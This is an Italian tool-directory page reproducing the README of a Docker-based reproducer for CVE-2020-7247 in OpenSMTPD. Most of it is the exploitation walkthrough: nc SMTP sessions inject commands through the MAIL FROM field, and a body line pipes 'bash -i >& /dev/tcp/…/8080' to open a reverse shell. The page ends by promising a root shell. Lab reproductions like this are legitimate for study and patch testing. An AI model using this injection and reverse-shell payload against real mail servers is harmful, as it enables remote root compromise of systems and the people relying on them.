Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-7247-reproducer — Ambiente basato su Docker per riprodurre CVE-2020-7247 (OpenSMTPD) con uno script di exploit in Python per esecuzione arbitraria di comandi e reverse shell tramite campo SMTP MAIL FROM appositamente creato. | Kitploit
Strumenti/GitHubGitHub/minhluannguyen/cve-2020-7247-reproducer
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubminhluannguyen/cve-2020-7247-reproducer

CVE-2020-7247-reproducer

Ambiente basato su Docker per riprodurre CVE-2020-7247 (OpenSMTPD) con uno script di exploit in Python per esecuzione arbitraria di comandi e reverse shell tramite campo SMTP MAIL FROM appositamente creato.

Vedi Repository
131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-7247 (OpenSMTPD)

Informazioni

Questo repository contiene i file necessari per creare un'immagine Docker che contiene un ambiente vulnerabile di OpenSMTPD (6.6.1p1). La vulnerabilità consente a un attaccante di eseguire comandi arbitrari attraverso una sessione SMTP appositamente predisposta, in particolare nel campo MAIL FROM.

Utilizzo

  1. Costruisci l'immagine Docker (basata su Debian):
root@kitploit:~
docker build -t opensmtpd-vuln -f Dockerfile .
docker run -it --rm --name opensmtpd-vuln-test opensmtpd-vuln /bin/bash
smtpd -dv
  1. Costruisci l'immagine Nix:
root@kitploit:~
nix-build opensmtpd-vuln.nix
docker load < result
docker run -it --rm opensmtpd-vuln-nix /bin/bash
smtpd -dv

Sfruttamento

  1. Sfrutta la vulnerabilità:

3.1. :

Esegui comandi arbitrari
root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;touch secret.txt;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

Hello Bonjour Xin chào
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

3.2. Ottieni una reverse shell:

Imposta un listener:

root@kitploit:~
nc -lnvp 8080

Esegui lo script exploit.py (su un altro terminale):

root@kitploit:~
python3 exploit.py

Oppure fallo manualmente:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
sh -c 'echo "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1" | bash'
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

Ora dovresti avere una shell come root sulla macchina host.

Riferimenti

  • OpenSMTPD
  • NVD
Scarica lo strumento